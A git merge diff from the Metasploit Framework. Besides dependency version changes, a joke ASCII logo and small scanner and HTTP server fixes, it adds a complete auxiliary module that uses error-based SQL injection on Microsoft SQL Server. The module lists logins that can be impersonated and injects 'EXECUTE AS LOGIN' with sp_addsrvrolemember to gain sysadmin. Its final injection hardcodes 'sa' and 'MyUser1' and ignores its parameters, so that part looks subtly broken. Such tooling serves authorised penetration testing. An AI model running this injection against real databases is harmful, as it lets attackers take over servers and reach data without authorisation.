Merge branch 'master' of github.com:rapid7/metasploit-framework

Conflicts:
	Gemfile.lock

Author: David Maloney

Gemfile.lock

@@ -22,7 +22,7 @@ PATH
       tzinfo
     metasploit-framework-db (4.10.1.pre.dev)
       activerecord (< 4.0.0)
-      metasploit-credential (~> 0.13.0)
+      metasploit-credential (~> 0.12.0)
       metasploit-framework (= 4.10.1.pre.dev)
       metasploit_data_models (~> 0.21.1)
       pg (>= 0.11)
@@ -112,7 +112,7 @@ GEM
     metasploit-concern (0.3.0)
       activesupport (~> 3.0, >= 3.0.0)
       railties (< 4.0.0)
-    metasploit-credential (0.13.2)
+    metasploit-credential (0.12.0)
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
       metasploit_data_models (~> 0.21.0)
@@ -135,12 +135,12 @@ GEM
     meterpreter_bins (0.0.10)
     method_source (0.8.2)
     mime-types (1.25.1)
-    mini_portile (0.6.1)
+    mini_portile (0.6.0)
     msgpack (0.5.9)
     multi_json (1.0.4)
     network_interface (0.0.1)
-    nokogiri (1.6.4.1)
-      mini_portile (~> 0.6.0)
+    nokogiri (1.6.3.1)
+      mini_portile (= 0.6.0)
     packetfu (1.1.9)
     pcaprub (0.11.3)
     pg (0.17.1)
@@ -175,7 +175,7 @@ GEM
     rb-readline (0.5.1)
     rdoc (3.12.2)
       json (~> 1.4)
-    recog (1.0.5)
+    recog (1.0.0)
       nokogiri
     redcarpet (3.1.2)
     rkelly-remix (0.0.6)
@@ -207,7 +207,7 @@ GEM
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
     slop (3.6.0)
-    sprockets (2.2.3)
+    sprockets (2.2.2)
       hike (~> 1.2)
       multi_json (~> 1.0)
       rack (~> 1.0)
@@ -219,7 +219,7 @@ GEM
     treetop (1.4.15)
       polyglot
       polyglot (>= 0.3.1)
-    tzinfo (0.3.42)
+    tzinfo (0.3.41)
     xpath (2.0.0)
       nokogiri (~> 1.3)
     yard (0.8.7.4)

data/logos/metasploit-trail.txt

@@ -0,0 +1,41 @@
+%clr
+%mag     .~+P``````-o+:.                                      -o+:.%clr
+%mag.+oooyysyyssyyssyddh++os-`````                        ```````````````          `%clr
+%mag+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o%clr
+%mag++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy%clr
+%mag--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///%clr
+%mag                                `...............`              `...-/////...`%clr
+%clr
+%clr
+%whi                                  .::::::::::-.                     .::::::-%clr
+%whi                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo%clr
+%whi                                 :Nm-/NMMMMMMMMMMMMM%blu$$%whiNMMMMm%blu&&%whiMMMMMMMMMMMMMMy%clr
+%whi                                 .sm/`-yMMMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMMh`%clr
+%whi                                  -Nd`  :MMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMh`%clr
+%whi                                   -Nh` .yMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMm/%clr
+%whi    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMm/%clr
+%whi      .yNmMMh%dred//%whi+syysso-``````       -mh` :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMd%clr
+%whi    .shMMMMN%dred//%whidmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/%clr
+%whi    `///omh%dred//%whidMMMMMMMMMMMMMMMN/%dred:::::/+ooso--/ydh//+s+/ossssso:--syN///os:%clr
+%whi          /MMMMMMMMMMMMMMMMMMd.     %dred`/++-.-yy/%whi...%dredosydh/-+oo:-`o//%whi...%dredoyodh+%clr
+%whi          -hMMmssddd+:dMMmNMMh.     %dred`.-=mmk.%whi//^^^\\%dred.^^`:++:^^o:%whi//^^^\\%dred`::%clr
+%whi          .sMMmo.    -dMd--:mN/`           %whi||--X--||%clr          %dred%whi||--X--||%clr
+%whi........../yddy/:...+hmo-...hdd:............%whi\\=v=//%clr............%dred%whi\\=v=//%clr.........
+%grn================================================================================%clr
+%grn=====================%whi+--------------------------------+%grn=========================%clr
+%grn=====================%whi| Session one died of dysentery. |%grn=========================%clr
+%grn=====================%whi+--------------------------------+%grn=========================%clr
+%grn================================================================================%clr
+%clr
+%clr                     %grnPress ENTER to size up the situation%clr
+%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
+%clr
+%clr                        %whiPress SPACE BAR to continue%clr
+%clr

lib/msf/core/auxiliary/scanner.rb

@@ -59,9 +59,15 @@ def run
   @tl = []
 
   #
-  # Sanity check threading on different platforms
+  # Sanity check threading given different conditions
   #
 
+  if datastore['CPORT'].to_i != 0 && threads_max > 1
+    print_error("Warning: A maximum of one thread is possible when a source port is set (CPORT)")
+    print_error("Thread count has been adjusted to 1")
+    threads_max = 1
+  end
+
   if(Rex::Compat.is_windows)
     if(threads_max > 16)
       print_error("Warning: The Windows platform cannot reliably support more than 16 threads")

lib/msf/core/exploit/http/server.rb

@@ -476,7 +476,7 @@ def get_uri(cli=self.cli)
       host = "[#{host}]"
     end
 
-    if datastore['URIPORT']
+    if datastore['URIPORT'] != 0
       port = ':' + datastore['URIPORT'].to_s
     elsif (ssl and datastore["SRVPORT"] == 443)
       port = ''

metasploit-framework-db.gemspec

@@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
 
   spec.add_runtime_dependency 'activerecord', rails_version_constraint
   # Metasploit::Credential database models
-  spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.0'
+  spec.add_runtime_dependency 'metasploit-credential', '~> 0.12.0'
   # Database models shared between framework and Pro.
   spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/mssql_commands'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::MSSQL_SQLI
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft SQL Server - SQLi Escalate Execute As',
+      'Description'    => %q{
+        This module can be used escalate privileges if the IMPERSONATION privilege has been
+        assigned to the user via error based SQL injection.  In most cases this results in
+        additional data access, but in some cases it can be used to gain sysadmin privileges.
+        The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
+      },
+      'Author'         => ['nullbind <scott.sutherland[at]netspi.com>'],
+      'License'        => MSF_LICENSE,
+      'References'     => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]
+    ))
+  end
+
+  def run
+    # Get the database user name
+    print_status("#{peer} - Grabbing the database user name...")
+    db_user = get_username
+    if db_user.nil?
+      print_error("#{peer} - Unable to grab user name...")
+      return
+    else
+      print_good("#{peer} - Database user: #{db_user}")
+    end
+
+    # Grab sysadmin status
+    print_status("#{peer} - Checking if #{db_user} is already a sysadmin...")
+    admin_status = check_sysadmin
+
+    if admin_status.nil?
+      print_error("#{peer} - Couldn't retrieve user status, aborting...")
+      return
+    elsif admin_status == '1'
+      print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.")
+      return
+    else
+      print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.")
+    end
+
+    # Get list of users that can be impersonated
+    print_status("#{peer} - Enumerating a list of users that can be impersonated...")
+    imp_user_list = check_imp_users
+    if imp_user_list.nil? || imp_user_list.empty?
+      print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.")
+      return
+    else
+      # Display list of users that can be impersonated
+      print_good("#{peer} - #{imp_user_list.length} users can be impersonated:")
+      imp_user_list.each do |dbuser|
+        print_status("#{peer} -   #{dbuser}")
+      end
+    end
+
+    # Check if any of the users that can be impersonated are sysadmins
+    print_status("#{peer} - Checking if any of them are sysadmins...")
+    imp_user_sysadmin = check_imp_sysadmin(imp_user_list)
+    if imp_user_sysadmin.nil?
+      print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.")
+      return
+    end
+
+    # Attempt to escalate to sysadmin
+    print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...")
+    escalate_privs(imp_user_sysadmin,db_user)
+
+    admin_status = check_sysadmin
+    if admin_status && admin_status == '1'
+      print_good("#{peer} - Success! #{db_user} is now a sysadmin!")
+    else
+      print_error("#{peer} - Fail buckets, something went wrong.")
+    end
+  end
+
+  def get_username
+    # Setup query to check for database username
+    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
+    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
+    sql = "(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')"
+
+    # Run query
+    result = mssql_query(sql)
+
+    # Parse result
+    if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
+      user_name = $1
+    else
+      user_name = nil
+    end
+
+    user_name
+  end
+
+  def check_sysadmin
+    # Setup query to check for sysadmin
+    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
+    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
+    sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')"
+
+    # Run query
+    result = mssql_query(sql)
+
+    # Parse result
+    if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
+      status = $1
+    else
+      status = nil
+    end
+
+    status
+  end
+
+  def check_imp_users
+    # Setup query to check for trusted databases owned by sysadmins
+    clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
+    clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
+
+    # Setup query
+    sql = "(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'
+    FROM  sys.server_permissions a
+    INNER JOIN sys.server_principals b
+    ON a.grantor_principal_id = b.principal_id
+    WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))"
+
+    # Run query
+    res = mssql_query(sql)
+
+    unless res && res.body
+      return nil
+    end
+
+    #Parse results
+    parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
+
+    if parsed_result && !parsed_result.empty?
+      parsed_result.flatten!
+      parsed_result.uniq!
+    end
+
+    parsed_result
+  end
+
+  def check_imp_sysadmin(imp_user_list)
+    # Check if the user has the db_owner role is any databases
+    imp_user_list.each do |imp_user|
+      # Setup query
+      clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
+      clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
+
+      sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')"
+
+      # Run query
+      result = mssql_query(sql)
+
+      unless result && result.body
+        next
+      end
+
+      #Parse results
+      parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
+
+      if parsed_result && !parsed_result.empty?
+        parsed_result.flatten!
+        parsed_result.uniq!
+      end
+
+      # check if user is a sysadmin
+      if parsed_result && parsed_result[0] == '1'
+        print_good("#{peer} -   #{imp_user} is a sysadmin!")
+        return imp_user
+      else
+        print_status("#{peer} -   #{imp_user} is NOT a sysadmin")
+      end
+    end
+
+    nil
+  end
+
+  # Attempt to escalate privileges
+  def escalate_privs(imp_user,db_user)
+
+    # Setup Query - Impersonate the first sysadmin user on the list
+    evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
+
+    # Execute Query
+    mssql_query(evil_sql)
+  end
+end